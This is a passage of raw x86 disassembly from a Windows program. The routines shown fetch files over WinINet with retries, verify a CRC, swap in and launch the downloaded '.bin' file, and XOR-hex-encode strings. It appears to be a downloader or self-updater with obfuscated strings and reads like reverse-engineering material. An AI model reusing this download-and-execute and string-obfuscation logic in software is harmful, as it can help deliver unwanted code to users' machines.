loc_402808: ; CODE XREF: sub_4027A4+5B�j
push offset aInternetopena ; "InternetOpenA"
mov ecx, [ebp+var_1C]
push ecx
call dword_413060 ; GetProcAddress
mov [ebp+var_202C], eax
push offset aInternetopenur ; "InternetOpenUrlA"
mov edx, [ebp+var_1C]
push edx
call dword_413060 ; GetProcAddress
mov [ebp+var_8], eax
push offset aInternetcloseh ; "InternetCloseHandle"
mov eax, [ebp+var_1C]
push eax
call dword_413060 ; GetProcAddress
mov [ebp+var_10], eax
push offset aInternetreadfi ; "InternetReadFile"
mov ecx, [ebp+var_1C]
push ecx
call dword_413060 ; GetProcAddress
mov [ebp+var_18], eax
mov edx, [ebp+var_2034]
mov dword ptr [edx+4], 0
mov [ebp+var_20], 0
mov [ebp+var_2024], 0
mov [ebp+var_C], 0
push 0
push 0
push 0
push 1
push 0
call [ebp+var_202C]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_402898
xor eax, eax
jmp loc_4029EA
; ---------------------------------------------------------------------------
loc_402898: ; CODE XREF: sub_4027A4+EB�j
push 0
push 9
push 0
push 0
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_20]
push ecx
call [ebp+var_8]
mov [ebp+var_2024], eax
cmp [ebp+var_2024], 0
jnz short loc_4028C1
xor eax, eax
jmp loc_4029EA
; ---------------------------------------------------------------------------
loc_4028C1: ; CODE XREF: sub_4027A4+114�j
mov [ebp+var_2028], 2000h
mov [ebp+var_4], 0
mov edx, [ebp+var_2034]
cmp dword ptr [edx+4], 0
jz short loc_4028FB
mov eax, [ebp+var_2034]
mov ecx, [eax+4]
push ecx
call dword_41304C ; GlobalFree
mov edx, [ebp+var_2034]
mov dword ptr [edx+4], 0
loc_4028FB: ; CODE XREF: sub_4027A4+138�j
push 0
push 40h
call dword_41305C ; GlobalAlloc
mov ecx, [ebp+var_2034]
mov [ecx+4], eax
loc_40290E: ; CODE XREF: sub_4027A4+1F9�j
lea edx, [ebp+var_14]
push edx
push 1FFFh
lea eax, [ebp+var_2020]
push eax
mov ecx, [ebp+var_2024]
push ecx
call [ebp+var_18]
test eax, eax
jz short loc_4029A2
cmp [ebp+var_14], 0
jnz short loc_402934
jmp short loc_4029A2
; ---------------------------------------------------------------------------
loc_402934: ; CODE XREF: sub_4027A4+18C�j
mov edx, [ebp+var_14]
mov [ebp+edx+var_2020], 0
cmp [ebp+var_14], 2000h
jnb short loc_402952
mov [ebp+var_2030], 0
loc_402952: ; CODE XREF: sub_4027A4+1A2�j
push 2
mov eax, [ebp+var_4]
add eax, [ebp+var_14]
push eax
mov ecx, [ebp+var_2034]
mov edx, [ecx+4]
push edx
call dword_413058 ; GlobalReAlloc
mov ecx, [ebp+var_2034]
mov [ecx+4], eax
mov edx, [ebp+var_14]
push edx
lea eax, [ebp+var_2020]
push eax
mov ecx, [ebp+var_2034]
mov edx, [ecx+4]
add edx, [ebp+var_4]
push edx
call sub_411634 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
add eax, [ebp+var_14]
mov [ebp+var_4], eax
jmp loc_40290E
; ---------------------------------------------------------------------------
loc_4029A2: ; CODE XREF: sub_4027A4+186�j
; sub_4027A4+18E�j
cmp [ebp+var_20], 0
jz short loc_4029AF
mov ecx, [ebp+var_20]
push ecx
call [ebp+var_10]
loc_4029AF: ; CODE XREF: sub_4027A4+202�j
cmp [ebp+var_2024], 0
jz short loc_4029C2
mov edx, [ebp+var_2024]
push edx
call [ebp+var_10]
loc_4029C2: ; CODE XREF: sub_4027A4+212�j
cmp [ebp+var_C], 0
jz short loc_4029CF
mov eax, [ebp+var_C]
push eax
call [ebp+var_10]
loc_4029CF: ; CODE XREF: sub_4027A4+222�j
mov ecx, [ebp+var_1C]
push ecx
call dword_413054 ; FreeLibrary
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2034]
mov ecx, [eax+4]
mov [edx], ecx
mov eax, [ebp+var_4]
loc_4029EA: ; CODE XREF: sub_4027A4+1B�j
; sub_4027A4+5F�j ...
mov esp, ebp
pop ebp
retn 8
sub_4027A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029F0 proc near ; DATA XREF: HSho:off_4132CC�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_4026C7
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_402A15
mov ecx, [ebp+var_4]
push ecx
call sub_4114EE
add esp, 4
loc_402A15: ; CODE XREF: sub_4029F0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_4029F0 endp
; =============== S U B R O U T I N E =======================================
sub_402A1E proc near ; CODE XREF: sub_4095C0+34�p
mov eax, offset loc_411B7B
call sub_41163A ; _EH_prolog
sub esp, 27Ch
push ebx
push esi
mov esi, ecx
push edi
mov [ebp-1Ch], esi
call sub_41151E
and dword ptr [ebp-4], 0
lea ecx, [esi+4]
call sub_41151E
lea ebx, [esi+8]
mov byte ptr [ebp-4], 1
mov ecx, ebx
call sub_41151E
lea ecx, [esi+10h]
mov byte ptr [ebp-4], 2
call sub_41151E
lea ecx, [esi+14h]
mov byte ptr [ebp-4], 3
call sub_41151E
lea edi, [esi+1Ch]
mov byte ptr [ebp-4], 4
mov ecx, edi
call sub_41151E
lea ecx, [esi+20h]
mov byte ptr [ebp-4], 5
call sub_41151E
lea ecx, [esi+24h]
mov byte ptr [ebp-4], 6
call sub_41151E
lea ecx, [esi+202Ch]
mov byte ptr [ebp-4], 7
call sub_4026B0
lea eax, [ebp-288h]
push 121h
push eax
mov byte ptr [ebp-4], 8
call dword_4130D4 ; GetWindowsDirectoryA
lea eax, [ebp-164h]
push 104h
push eax
push 0
call dword_4130D8 ; GetModuleFileNameA
lea eax, [ebp-288h]
mov ecx, edi
push eax
call sub_41150C
mov edi, dword_4130E0
push 1Ch
call edi ; Sleep
lea eax, [ebp-164h]
lea ecx, [esi+20h]
push eax
call sub_41150C
lea eax, [ebp-44h]
push 1
push eax
mov ecx, esi
call sub_404B40
lea eax, [ebp-44h]
mov ecx, ebx
push eax
call sub_41150C
push 20h
call edi ; Sleep
push 43h
lea eax, [ebp-18h]
push offset aD ; "%d"
push eax
call dword_41329C ; wsprintfA
add esp, 0Ch
push 21h
call edi ; Sleep
lea eax, [ebp-18h]
mov ecx, esi
push eax
call sub_41150C
lea ecx, [ebp-14h]
call sub_41151E
push ecx
mov byte ptr [ebp-4], 9
mov eax, esp
mov [ebp-10h], esp
push esi
push ebx
push eax
call sub_411524
lea eax, [ebp-10h]
mov ecx, esi
push eax
call sub_402FAF
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 0Ah
call sub_411518
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 9
call sub_411512
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-10h], esp
push eax
call sub_411506
mov ecx, esi
call sub_405543
test al, al
jz short loc_402B90
mov byte ptr [esi+18h], 1
jmp short loc_402B94
; ---------------------------------------------------------------------------
loc_402B90: ; CODE XREF: sub_402A1E+16A�j
push 21h
call edi ; Sleep
loc_402B94: ; CODE XREF: sub_402A1E+170�j
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 8
call sub_411512
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn
sub_402A1E endp
; =============== S U B R O U T I N E =======================================
sub_402BB1 proc near ; CODE XREF: sub_409540+4D�p
; HSho:00412512�p ...
mov eax, offset loc_411BDD
call sub_41163A ; _EH_prolog
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
push 0
mov dword ptr [ebp-4], 7
call dword_4132B0
lea ecx, [esi+202Ch]
call sub_4026C7
lea ecx, [esi+24h]
mov byte ptr [ebp-4], 6
call sub_411512
lea ecx, [esi+20h]
mov byte ptr [ebp-4], 5
call sub_411512
lea ecx, [esi+1Ch]
mov byte ptr [ebp-4], 4
call sub_411512
lea ecx, [esi+14h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [esi+10h]
mov byte ptr [ebp-4], 2
call sub_411512
lea ecx, [esi+8]
mov byte ptr [ebp-4], 1
call sub_411512
and byte ptr [ebp-4], 0
lea ecx, [esi+4]
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_411512
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_402BB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C48 proc near ; CODE XREF: sub_402EC9+30�p
var_1844 = byte ptr -1844h
var_1044 = byte ptr -1044h
var_844 = byte ptr -844h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1844h
call sub_4115D0
push ebx
push esi
push edi
mov edi, dword_4130CC
push [ebp+arg_8]
lea eax, [ebp+var_1044]
mov [ebp+var_4], ecx
push eax
call edi ; lstrcpyA
push [ebp+arg_C]
mov esi, dword_413074
lea eax, [ebp+var_1044]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_1044]
push offset a_bin ; ".bin"
push eax
call esi ; lstrcatA
push [ebp+arg_8]
lea eax, [ebp+var_1844]
push eax
call edi ; lstrcpyA
push [ebp+arg_C]
lea eax, [ebp+var_1844]
push eax
call esi ; lstrcatA
cmp byte ptr [ebp+arg_14], 0
mov [ebp+arg_C], 3
mov [ebp+var_8], 1
jz short loc_402CBD
and [ebp+var_8], 0
loc_402CBD: ; CODE XREF: sub_402C48+6F�j
push ecx
mov ecx, esp
mov [ebp+arg_14], esp
push offset aInstallzip ; "InstallZip()\n"
call sub_4114FA
mov ecx, [ebp+var_4]
call sub_404B34
mov ebx, dword_4130E0
loc_402CDB: ; CODE XREF: sub_402C48+10B�j
lea eax, [ebp+var_1044]
push eax
mov eax, [ebp+var_4]
push [ebp+arg_0]
lea ecx, [eax+202Ch]
call sub_4026DB
test al, al
jz short loc_402D45
lea eax, [ebp+var_1044]
push eax
call sub_4021DB
test eax, eax
pop ecx
jz short loc_402D45
cmp [ebp+arg_1C], 0
jz short loc_402D5E
push [ebp+arg_1C]
push ecx
mov ecx, esp
mov [ebp+arg_14], esp
push [ebp+arg_8]
call sub_4114FA
mov ecx, [ebp+var_4]
call sub_404AAE
cmp al, 1
jz short loc_402D5E
lea eax, [ebp+var_844]
push offset aCrcFailed ; "crc failed:"
push eax
call edi ; lstrcpyA
push [ebp+arg_8]
lea eax, [ebp+var_844]
push eax
call esi ; lstrcatA
loc_402D45: ; CODE XREF: sub_402C48+AD�j
; sub_402C48+BE�j
dec [ebp+arg_C]
push 0EA7Ch
call ebx ; Sleep
cmp [ebp+arg_C], 0
jnz short loc_402CDB
loc_402D55: ; CODE XREF: sub_402C48+207�j
xor al, al
loc_402D57: ; CODE XREF: sub_402C48+27C�j
pop edi
pop esi
pop ebx
leave
retn 24h
; ---------------------------------------------------------------------------
loc_402D5E: ; CODE XREF: sub_402C48+C4�j
; sub_402C48+E1�j
push [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ebp+var_1044]
push eax
call sub_404A2D
test al, al
jz loc_402EC2
cmp [ebp+arg_10], 0
jz loc_402EC2
push [ebp+arg_8]
call sub_4021DB
test eax, eax
pop ecx
jz short loc_402DDD
push [ebp+arg_8]
lea eax, [ebp+var_844]
push eax
call edi ; lstrcpyA
lea eax, [ebp+var_844]
push offset a_old ; ".old"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_844]
push 1
push eax
push [ebp+arg_8]
call sub_401D8A
lea eax, [ebp+var_844]
push eax
call sub_4021DB
add esp, 10h
test eax, eax
jz short loc_402DDD
lea eax, [ebp+var_844]
push 1
push eax
call sub_401C92
pop ecx
pop ecx
loc_402DDD: ; CODE XREF: sub_402C48+145�j
; sub_402C48+183�j
lea eax, [ebp+var_844]
push offset aCrcOkInstall ; "crc ok, Install("
push eax
call edi ; lstrcpyA
push [ebp+arg_8]
lea eax, [ebp+var_844]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_844]
push offset asc_4170B4 ; ")"
push eax
call esi ; lstrcatA
push ecx
lea eax, [ebp+var_844]
mov ecx, esp
mov [ebp+arg_14], esp
push eax
call sub_4114FA
mov ecx, [ebp+var_4]
call sub_404B34
lea eax, [ebp+var_1044]
push eax
call sub_4021DB
test eax, eax
pop ecx
jz short loc_402E40
lea eax, [ebp+var_1044]
push 1
push eax
call sub_401C92
pop ecx
pop ecx
loc_402E40: ; CODE XREF: sub_402C48+1E6�j
lea eax, [ebp+var_1844]
push eax
call sub_4021DB
test eax, eax
pop ecx
jz loc_402D55
push 25h
call ebx ; Sleep
push 3Ch
pop esi
push esi
call ebx ; Sleep
push esi
lea eax, [ebp+var_44]
push 0
push eax
call sub_411622 ; memset
lea eax, [ebp+var_1844]
add esp, 0Ch
mov [ebp+var_34], eax
mov eax, [ebp+arg_4]
mov [ebp+var_30], eax
mov eax, [ebp+var_8]
push 5Bh
mov [ebp+var_44], esi
mov [ebp+var_38], offset aOpen ; "OPEN"
mov [ebp+var_28], eax
call ebx ; Sleep
push 0A1h
mov [ebp+var_40], 40h
call ebx ; Sleep
cmp [ebp+arg_C], 0
jle short loc_402EC2
mov ecx, [ebp+var_4]
lea eax, [ebp+var_44]
push eax
call sub_406208
cmp [ebp+arg_18], 0
jz short loc_402EC2
push 0FFFFFFFFh
push [ebp+var_C]
call dword_4130D0 ; WaitForSingleObject
loc_402EC2: ; CODE XREF: sub_402C48+12A�j
; sub_402C48+134�j ...
mov al, 1
jmp loc_402D57
sub_402C48 endp
; =============== S U B R O U T I N E =======================================
sub_402EC9 proc near ; CODE XREF: sub_404605+262�p
mov eax, offset loc_411BE8
call sub_41163A ; _EH_prolog
push ecx
push ebx
push esi
push edi
and dword ptr [ebp-4], 0
mov [ebp-10h], esp
push dword ptr [ebp+28h]
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_402C48
test al, al
setnz al
jmp short loc_402F0D
; ---------------------------------------------------------------------------
loc_402F05: ; DATA XREF: HSho:00414F94�o
mov eax, offset loc_402F0B
retn
; ---------------------------------------------------------------------------
loc_402F0B: ; DATA XREF: sub_402EC9:loc_402F05�o
xor al, al
loc_402F0D: ; CODE XREF: sub_402EC9+3A�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 24h
sub_402EC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F1E proc near ; CODE XREF: sub_40831F+58D�p
var_868 = byte ptr -868h
var_68 = byte ptr -68h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 868h
push ebx
push esi
push edi
mov esi, dword_4130CC
push 3
lea eax, [ebp+var_868]
pop edi
mov ebx, ecx
push [ebp+arg_0]
push eax
call esi ; lstrcpyA
add ebx, 202Ch
loc_402F47: ; CODE XREF: sub_402F1E+85�j
push [ebp+arg_4]
lea eax, [ebp+var_868]
mov ecx, ebx
push eax
call sub_4027A4
test eax, eax
mov [ebp+var_4], eax
jbe short loc_402F61
xor edi, edi
loc_402F61: ; CODE XREF: sub_402F1E+3F�j
test edi, edi
jz short loc_402FA5
dec edi
lea eax, [ebp+var_68]
push edi
push offset aRetryD ; "&retry=%d"
push eax
call dword_4131E4 ; sprintf
add esp, 0Ch
lea eax, [ebp+var_868]
push [ebp+arg_0]
push eax
call esi ; lstrcpyA
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_868]
push eax
call dword_413074 ; lstrcatA
push 493FCh
call dword_4130E0 ; Sleep
test edi, edi
jnz short loc_402F47
loc_402FA5: ; CODE XREF: sub_402F1E+45�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn 8
sub_402F1E endp
; =============== S U B R O U T I N E =======================================
sub_402FAF proc near ; CODE XREF: sub_402A1E+134�p
; sub_404605+F9�p ...
mov eax, offset loc_411C1B
call sub_41163A ; _EH_prolog
mov eax, 4010h
call sub_4115D0
and dword ptr [ebp-1Ch], 0
push ebx
push esi
push edi
mov dl, ds:byte_419C40
mov esi, 7FFh
mov ecx, esi
xor eax, eax
lea edi, [ebp-201Bh]
mov [ebp-201Ch], dl
rep stosd
stosw
stosb
mov ecx, esi
xor eax, eax
lea edi, [ebp-401Bh]
mov [ebp-401Ch], dl
rep stosd
stosw
lea ecx, [ebp-10h]
mov dword ptr [ebp-4], 1
stosb
call sub_41151E
push offset dword_417110
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 2
call sub_41150C
mov eax, [ebp+0Ch]
xor esi, esi
mov ebx, [eax-8]
test ebx, ebx
jle short loc_40306E
mov edi, [ebp-10h]
mov [ebp-14h], eax
lea eax, [ebp-201Ch]
sub [ebp-14h], eax
loc_40303A: ; CODE XREF: sub_402FAF+BD�j
test esi, esi
jle short loc_403053
mov ecx, [edi-8]
mov eax, esi
cdq
idiv ecx
test eax, eax
mov eax, esi
jle short loc_403055
cdq
idiv ecx
mov eax, edx
jmp short loc_403055
; ---------------------------------------------------------------------------
loc_403053: ; CODE XREF: sub_402FAF+8D�j
mov eax, esi
loc_403055: ; CODE XREF: sub_402FAF+9B�j
; sub_402FAF+A2�j
mov edx, [ebp-14h]
mov al, [eax+edi]
lea ecx, [ebp+esi-201Ch]
mov dl, [edx+ecx]
xor al, dl
inc esi
cmp esi, ebx
mov [ecx], al
jl short loc_40303A
loc_40306E: ; CODE XREF: sub_402FAF+7A�j
xor esi, esi
test ebx, ebx
jle short loc_4030A8
loc_403074: ; CODE XREF: sub_402FAF+F7�j
movzx eax, byte ptr [ebp+esi-201Ch]
push eax
lea eax, [ebp-16h]
push offset a02x ; "%02X"
push eax
call dword_4131E4 ; sprintf
lea eax, [ebp-16h]
push eax
lea eax, [ebp-401Ch]
push eax
call sub_411640 ; strcat
mov eax, [ebp+0Ch]
add esp, 14h
inc esi
cmp esi, [eax-8]
jl short loc_403074
loc_4030A8: ; CODE XREF: sub_402FAF+C3�j
push offset byte_419C40
lea ecx, [ebp+0Ch]
call sub_41150C
mov ecx, [ebp+8]
lea eax, [ebp-401Ch]
push eax
call sub_4114FA
mov dword ptr [ebp-1Ch], 1
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_411512
and byte ptr [ebp-4], 0
lea ecx, [ebp+0Ch]
call sub_411512
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 8
sub_402FAF endp
; =============== S U B R O U T I N E =======================================
sub_4030F7 proc near ; CODE XREF: sub_404B40+359�p
; sub_405B91+59�p ...
mov eax, offset loc_411C57
call sub_41163A ; _EH_prolog
mov eax, 6018h
call sub_4115D0
mov dl, ds:byte_419C40
push ebx
push esi
mov [ebp-20h], ecx
mov esi, 7FFh
push edi
mov ecx, esi
xor eax, eax
lea edi, [ebp-4023h]
mov [ebp-4024h], dl
rep stosd
stosw
stosb
mov ecx, esi
xor eax, eax
lea edi, [ebp-2023h]
mov [ebp-2024h], dl
rep stosd
stosw
xor ebx, ebx
lea ecx, [ebp-10h]
mov [ebp-1Ch], ebx
stosb
call sub_41151E
lea ecx, [ebp-18h]
mov dword ptr [ebp-4], 1
call sub_41151E
push 5Bh
mov byte ptr [ebp-4], 2
call dword_4130E0 ; Sleep
mov esi, [ebp+10h]
lea eax, [esi+1]
push eax
lea eax, [ebp-6024h]
push dword ptr [ebp+0Ch]
push eax
call dword_4130C8 ; lstrcpynA
push offset dword_417110
lea ecx, [ebp-10h]
call sub_41150C
mov [ebp+10h], esi
xor edi, edi
shr dword ptr [ebp+10h], 1
jz loc_403230
loc_4031A0: ; CODE XREF: sub_4030F7+133�j
test ebx, ebx
jle short loc_4031BC
mov eax, [ebp-10h]
mov ecx, [eax-8]
mov eax, edi
cdq
idiv ecx
test eax, eax
jle short loc_4031BC
mov eax, edi
cdq
idiv ecx
mov esi, edx
jmp short loc_4031BE
; ---------------------------------------------------------------------------
loc_4031BC: ; CODE XREF: sub_4030F7+AB�j
; sub_4030F7+BA�j
mov esi, edi
loc_4031BE: ; CODE XREF: sub_4030F7+C3�j
push 2
lea eax, [ebp-6024h]
push ebx
push eax
lea eax, [ebp+0Ch]
lea ecx, [ebp-24h]
push eax
call sub_401ACF
push eax
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 3
call sub_411518
lea ecx, [ebp+0Ch]
mov byte ptr [ebp-4], 2
call sub_411512
push dword ptr [ebp-18h]
mov ecx, [ebp-20h]
call sub_403287
mov ecx, [ebp-10h]
movsx ecx, byte ptr [esi+ecx]
xor eax, ecx
push eax
lea eax, [ebp-12h]
push offset dword_417120
push eax
call dword_4131E4 ; sprintf
lea eax, [ebp-12h]
push eax
lea eax, [ebp-2024h]
push eax
call sub_411640 ; strcat
add esp, 14h
inc edi
inc ebx
inc ebx
cmp edi, [ebp+10h]
jb loc_4031A0
loc_403230: ; CODE XREF: sub_4030F7+A3�j
lea eax, [ebp-2024h]
push eax
lea eax, [ebp-4024h]
push eax
call sub_411628 ; strcpy
pop ecx
lea eax, [ebp-4024h]
pop ecx
mov ecx, [ebp+8]
push eax
call sub_4114FA
mov dword ptr [ebp-1Ch], 1
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_411512
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_411512
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 0Ch
sub_4030F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403287 proc near ; CODE XREF: sub_4030F7+FC�p
var_80 = byte ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
and [ebp+var_7C], 0
push ebx
push esi
push edi
push [ebp+arg_0]
mov [ebp+var_80], 30h
mov [ebp+var_78], 31h
mov [ebp+var_74], 1
mov [ebp+var_70], 32h
mov [ebp+var_6C], 2
mov [ebp+var_68], 33h
mov [ebp+var_64], 3
mov [ebp+var_60], 34h
mov [ebp+var_5C], 4
mov [ebp+var_58], 35h
mov [ebp+var_54], 5
mov [ebp+var_50], 36h
mov [ebp+var_4C], 6
mov [ebp+var_48], 37h
mov [ebp+var_44], 7
mov [ebp+var_40], 38h
mov [ebp+var_3C], 8
mov [ebp+var_38], 39h
mov [ebp+var_34], 9
mov [ebp+var_30], 41h
mov [ebp+var_2C], 0Ah
mov [ebp+var_28], 42h
mov [ebp+var_24], 0Bh
mov [ebp+var_20], 43h
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], 44h
mov [ebp+var_14], 0Dh
mov [ebp+var_10], 45h
mov [ebp+var_C], 0Eh
mov [ebp+var_8], 46h
mov [ebp+var_4], 0Fh
call dword_4131B0 ; _strdup
push eax
call dword_4131B4 ; _mbsupr
pop ecx
xor esi, esi
cmp byte ptr [eax], 30h
pop ecx
mov edx, eax
jnz short loc_403364
cmp byte ptr [eax+1], 58h
jnz short loc_403364
lea edx, [eax+2]
loc_403364: ; CODE XREF: sub_403287+D2�j
; sub_403287+D8�j
mov byte ptr [ebp+arg_0+3], 1
loc_403368: ; CODE XREF: sub_403287+10D�j
mov cl, [edx]
test cl, cl
jz short loc_403396
xor edi, edi
lea ebx, [ebp+var_80]
loc_403373: ; CODE XREF: sub_403287+F9�j
cmp cl, [ebx]
jz short loc_403382
inc edi
add ebx, 8
cmp edi, 10h
jge short loc_403396
jmp short loc_403373
; ---------------------------------------------------------------------------
loc_403382: ; CODE XREF: sub_403287+EE�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_40338B
shl esi, 4
loc_40338B: ; CODE XREF: sub_403287+FF�j
or esi, [ebp+edi*8+var_7C]
inc edx
and byte ptr [ebp+arg_0+3], 0
jmp short loc_403368
; ---------------------------------------------------------------------------
loc_403396: ; CODE XREF: sub_403287+E5�j
; sub_403287+F7�j
push eax
call dword_4131D4 ; free
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
sub_403287 endp
; =============== S U B R O U T I N E =======================================
sub_4033A7 proc near ; CODE XREF: sub_40831F+914�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
push ebp
push esi
mov esi, ecx
push edi
push ecx
mov ecx, esp
mov [esp+18h+var_4], esp
push offset dword_417124
call sub_4114FA
mov ecx, esi
call sub_404B34
mov eax, [esp+14h+arg_4]
xor ebx, ebx
cmp eax, ebx
jle loc_403480
mov ecx, [esp+14h+arg_0]
mov edi, dword_4130CC
mov [esp+14h+arg_4], eax
mov ebp, offset byte_419C40
lea esi, [ecx+4000h]
loc_4033ED: ; CODE XREF: sub_4033A7+D3�j
lea eax, [esi-4000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi-2000h]
push ebp
push eax
call edi ; lstrcpyA
push ebp
push esi
call edi ; lstrcpyA
lea eax, [esi+2000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+4000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+6000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+0E000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+0A000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+8000h]
push ebp
push eax
call edi ; lstrcpyA
lea eax, [esi+0C000h]
push ebp
push eax
call edi ; lstrcpyA
mov [esi+10001h], bl
mov byte ptr [esi+10002h], 1
mov [esi+10003h], bl
mov [esi+10004h], bl
mov [esi+10000h], bl
mov [esi+10008h], ebx
add esi, 1400Ch
dec [esp+14h+arg_4]
jnz loc_4033ED
loc_403480: ; CODE XREF: sub_4033A7+27�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
sub_4033A7 endp
; =============== S U B R O U T I N E =======================================
sub_403488 proc near ; CODE XREF: sub_40831F+94C�p
mov eax, offset loc_411D9D
call sub_41163A ; _EH_prolog
mov eax, 2134h
call sub_4115D0
push ebx
push esi
push edi
mov [ebp-28h], ecx
xor ebx, ebx
mov [ebp-4], ebx
mov [ebp-24h], ebx
mov [ebp-14h], ebx
push ecx
mov byte ptr [ebp-4], 1
mov ecx, esp
mov [ebp-2Ch], esp
push offset aParsexml ; "ParseXML()\n"
call sub_4114FA
mov ecx, [ebp-28h]
call sub_404B34
cmp [ebp+8], ebx
jnz short loc_4034D8
push 80004003h
call sub_411822
loc_4034D8: ; CODE XREF: sub_403488+44�j
mov ecx, [ebp+8]
lea eax, [ebp-1Ch]
push eax
call sub_4043E6
push dword ptr [eax]
lea ecx, [ebp-14h]
call sub_4062A0
lea ecx, [ebp-1Ch]
call sub_406293
mov edi, offset aS ; "%s"
loc_4034FB: ; CODE XREF: sub_403488+CA3�j
push ebx
lea ecx, [ebp-14h]
call sub_4062CB
test al, al
jnz loc_404130
push offset aConfigversio_0 ; "configversion"
lea ecx, [ebp-0C0h]
call sub_404151
mov esi, eax
cmp [ebp-14h], ebx
mov byte ptr [ebp-4], 2
jnz short loc_403531
push 80004003h
call sub_411822
loc_403531: ; CODE XREF: sub_403488+9D�j
mov ecx, [ebp-14h]
lea eax, [ebp-84h]
push eax
call sub_40430D
push esi
mov ecx, eax
call sub_4041B8
mov ebx, eax
lea ecx, [ebp-84h]
neg ebx
sbb bl, bl
inc bl
call sub_4041A5
lea ecx, [ebp-0C0h]
mov byte ptr [ebp-4], 1
call sub_4041A5
test bl, bl
jz loc_403632
cmp dword ptr [ebp-14h], 0
jnz short loc_403582
push 80004003h
call sub_411822
loc_403582: ; CODE XREF: sub_403488+EE�j
mov ecx, [ebp-14h]
lea eax, [ebp-0D0h]
push eax
call sub_40444A
mov ecx, [eax]
mov byte ptr [ebp-4], 3
test ecx, ecx
jz short loc_4035A2
call sub_404243
jmp short loc_4035A4
; ---------------------------------------------------------------------------
loc_4035A2: ; CODE XREF: sub_403488+111�j
xor eax, eax
loc_4035A4: ; CODE XREF: sub_403488+118�j
push eax
lea eax, [ebp-2140h]
push edi
push eax
call dword_4131E4 ; sprintf
add esp, 0Ch
lea ecx, [ebp-0D0h]
